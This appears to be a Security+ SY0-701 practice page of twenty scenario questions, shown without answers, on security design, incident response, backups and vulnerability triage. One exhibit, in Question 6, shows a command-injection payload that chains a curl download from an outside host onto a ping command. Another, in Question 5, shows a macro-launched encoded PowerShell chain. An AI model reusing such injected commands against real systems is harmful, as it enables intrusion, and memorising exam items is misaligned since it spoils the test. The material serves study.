
Scenario-based practice

Hard Difficulty Questions

Practise with original Security+ SY0-701 exam-style scenarios covering every exam domain, with detailed explanations, wrong-answer analysis, and common exam traps.

20 scenario questions | Exam code: SY0-701 | Vendor: CompTIA

Scenario guide

How to approach hard difficulty questions

These are the questions most candidates get wrong. They require connecting multiple concepts, reading tricky output, or knowing edge-case behaviour that isn't on most study cards. Practising them trains you to operate under uncertainty — a necessary skill on the real exam.

Quick answer

Hard-difficulty questions test whether you can apply the concept in context, not just recognise a definition. They focus on:
- How the topic appears in realistic exam-style scenarios.
- Which detail in the question changes the correct answer.
- How to eliminate plausible but wrong options.
- How to connect the question back to the wider exam objective.


Practice scenarios

Question 1 (hard, multi-select)

An operations team manages Linux servers over SSH. The security team wants to stop direct management access from employee laptops, reduce lateral movement if one admin endpoint is compromised, and keep a log of every administrative session. Which two design choices best fit? Select two.

Question 2 (hard, multiple choice)

An order-entry application must survive a single server failure and continue serving users if the primary site becomes unavailable. Management wants automatic failover, but does not want to pay for fully active production capacity in two regions. Which design is best?

Question 3 (hard, multiple choice)

Based on the exhibit, what is the best handling decision for the requested file?

Exhibit

Data request:
File: customer_export.csv
Contents: full name, street address, SSN last 4, account balance, support notes
Requestor: external troubleshooting contractor

Policy excerpt:
- Internal: company staff only
- Confidential: encrypt in transit, approved recipients only
- Restricted: minimize, mask where possible, owner approval required, time-limited access, logged sharing
- Public: may be shared externally without restriction

Question 4 (hard, multiple choice)

Based on the exhibit, what additional control is the best fit?

Exhibit

Current controls on the finance share:
- SMB signing enabled
- Weekly access review
- Nightly backups to immutable storage
- Antivirus scans at 02:00

Incident: a valid VPN account was used to access 40,000 files in 8 minutes and copy them to a local drive.
Goal: detect unauthorized bulk access quickly before exfiltration completes.

Question 5 (hard, multiple choice)

Based on the exhibit, what is the best immediate action for the SOC or IR team?

A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

Exhibit

Host: finance-lap07
10:22:11  winword.exe spawned powershell.exe -enc <redacted>
10:22:14  powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02  file rename activity: 184 files changed to *.locked
10:24:09  outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01  EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'

Question 6 (hard, multiple choice)

Based on the exhibit, what is the BEST remediation for the application flaw shown?

A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.

Exhibit

Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55

Question 7 (hard, multiple choice)

Based on the exhibit, which document type should be updated to make the approval and retention requirements mandatory across the organization?

Exhibit

Current document excerpt:
- Managers may approve external file sharing by email.
- Employees should keep the approval email in their inbox.
- Help desk records exceptions if time allows.
Audit note:
- No consistent evidence of approval or exception retention was found across departments.
Management objective:
- External sharing exceptions must be approved, retained, and auditable in a consistent way.

Question 8 (hard, multiple choice)

Based on the exhibit, what is the best next step before the hotfix is released?

Exhibit

Emergency change request CHG-8841
Service: Customer portal login API
Reason: critical authentication bug causing lockouts

Pipeline status:
- Code review: pending
- Automated unit tests: skipped to save time
- Integration tests: failed once and were not rerun
- Rollback plan: not documented
- Approval: verbal yes from operations supervisor
- Deployment window: 21:30-22:00 tonight

Question 9 (hard, multiple choice)

Based on the exhibit, which access change best follows least privilege while still allowing the help desk to complete the task?

Exhibit

Access request:
Requester: helpdesk_27
Task: reset one user's MFA enrollment and unlock one locked account
Current access:
- Helpdesk_ReadOnly: view user details only
- Helpdesk_Admin: unlock accounts and reset MFA for assigned tickets
- Domain_Admin: full server and directory administration

Proposal:
- Add helpdesk_27 to Domain_Admin for 7 days so the ticket can be completed quickly.

Question 10 (hard, multiple choice)

Based on the exhibit, which change best improves both recovery time and recovery point for the ERP database?

A mid-sized company has a two-hour RTO and a 30-minute RPO, but its current backup design cannot meet either objective during restore testing.

Exhibit

System: ERP database cluster
Business requirements:
- RTO = 2 hours
- RPO = 30 minutes
Current recovery design:
- Nightly full backup at 23:00 to onsite NAS
- Differential backup at 12:00
- Weekly copy replicated to cloud on Sundays
Restore test results:
- Cold rebuild of VM + database restore: 5 hours 40 minutes
- Data gap since last backup: 2 hours 18 minutes
- NAS is online and joined to the same domain as production servers

Question 11 (hard, multiple choice)

During routine checks, configuration management finds several branch firewalls drifted from the approved baseline because a contractor changed settings locally. An automation job now compares each device nightly and automatically reapplies the approved configuration without waiting for a human ticket. Which control type is the automation?

Question 12 (hard, multiple choice)

Based on the exhibit, what is the MOST likely explanation for the network traffic?

The affected host is not showing a large amount of internet-bound traffic, but its DNS behavior is highly unusual.

Exhibit

DNS query log excerpt:
Host: CORP-LT-17
16:18:02 a9f3d1k2d.update-check.com A NXDOMAIN
16:18:03 b7p9q2s1n.update-check.com A NXDOMAIN
16:18:04 k8z1m4c7r.update-check.com A NXDOMAIN
16:18:05 u3n6t9x0v.update-check.com A NXDOMAIN
16:18:06 9q2m7a4p1.update-check.com A NXDOMAIN

Proxy log excerpt:
No corresponding HTTP or HTTPS sessions observed
TTL observed: 60 seconds on all queries

Question 13 (hard, multiple choice)

Company-owned tablets are used by field staff for both corporate email and approved personal apps. Security must isolate company data from personal data, allow remote wipe of only the corporate workspace, and block access if the device is rooted or encryption is disabled. Which approach best fits?

Question 14 (hard, multiple choice)

Based on the exhibit, which security principle is the proposed workflow most directly enforcing?

Exhibit

Firewall rule change #4219:
- Requested by: NetworkOps1
- Approved by: NetworkOps1
- Implemented by: NetworkOps1
- Audit note: the same person can create, approve, and deploy production firewall changes.
Proposed redesign:
- Engineer drafts the change.
- Security reviewer approves it.
- A different administrator implements it during a maintenance window.
- The change ticket is visible only to the people assigned to the task.

Question 15 (hard, multiple choice)

Based on the exhibit, which change best improves recovery resilience against a repeat ransomware incident?

Exhibit

Current backup design:
- Production file server backs up nightly at 23:00 to NAS-Backup over SMB.
- NAS-Backup is mounted read/write to the file server 24x7.
- Weekly copy job replicates NAS contents to cloud object storage.
- Backup credentials are shared with the server admin group.
- Last restore test: 14 months ago.
Incident summary:
- Ransomware encrypted production files and then encrypted the NAS share using the same credentials.

Question 16 (hard, multiple choice)

Based on the exhibit, which issue should be remediated first by the operations team?

A small company has limited maintenance windows and can address only one of several findings this week.

Exhibit

Weekly vulnerability report:

1. vpn-gw01
   - Exposure: Internet-facing
   - Finding: Critical remote code execution
   - Notes: Vendor patch available; reboot required

2. db-lab02
   - Exposure: Internal only
   - Finding: High-severity authentication bypass
   - Notes: Isolated lab subnet; no sensitive data; no route to production

3. printsrv03
   - Exposure: Internet-facing administrative portal
   - Finding: Medium-severity outdated firmware
   - Notes: Vendor has not released a fix yet; temporary ACL blocks the admin port from the internet

Question 17 (hard, multiple choice)

Based on the exhibit, which key management improvement best preserves recoverability if the primary backup server is lost?

Exhibit

Backup job design
- Generate a random AES key to encrypt 8 TB of archive data
- Encrypt the AES key with the backup server’s public key
- Store the encrypted AES key alongside the archive
- Secondary site must restore the data if the primary backup server is unavailable
- Current design stores the corresponding private key only on the primary server

Question 18 (hard, multiple choice)

Based on the exhibit, which issue should be remediated FIRST?

The team can only fully fix one issue today. Management wants the choice that best reduces real-world risk, not just the highest severity score.

Exhibit

Vulnerability scan summary:

1) Internet-facing VPN appliance
   CVSS: 8.8
   Exploit status: public proof-of-concept available
   Exposure: reachable from the internet
   Compensating controls: none

2) Internal HR file server
   CVSS: 9.8
   Exploit status: no public exploit yet
   Exposure: reachable only from the employee VLAN
   Compensating controls: segmented network and MFA for admin access

3) Lab workstation
   CVSS: 10.0
   Exploit status: public exploit available
   Exposure: isolated lab VLAN with no routing to production

4) DMZ reporting server
   CVSS: 7.5
   Exploit status: public exploit available
   Exposure: internet-reachable, but protected by WAF and IP allowlisting

Question 19 (hard, multi-select)

During testing of a shopping portal, a POST request to /api/address/update succeeds even when the anti-CSRF token is removed. In a separate test, changing customerId=1842 to customerId=1843 in a GET request returns another user's invoice data. Which two vulnerabilities are present? Select two.

Question 20 (hard, multi-select)

EDR reports that a workstation launched PowerShell from a word processor, created a scheduled task named WinUpdateSvc, and began making repeated HTTPS connections to a rare external domain. The user is still logged in to several cloud apps. Which two response actions are best to initiate from the EDR console? Select two.

These SY0-701 practice questions are part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style SY0-701 questions with detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics.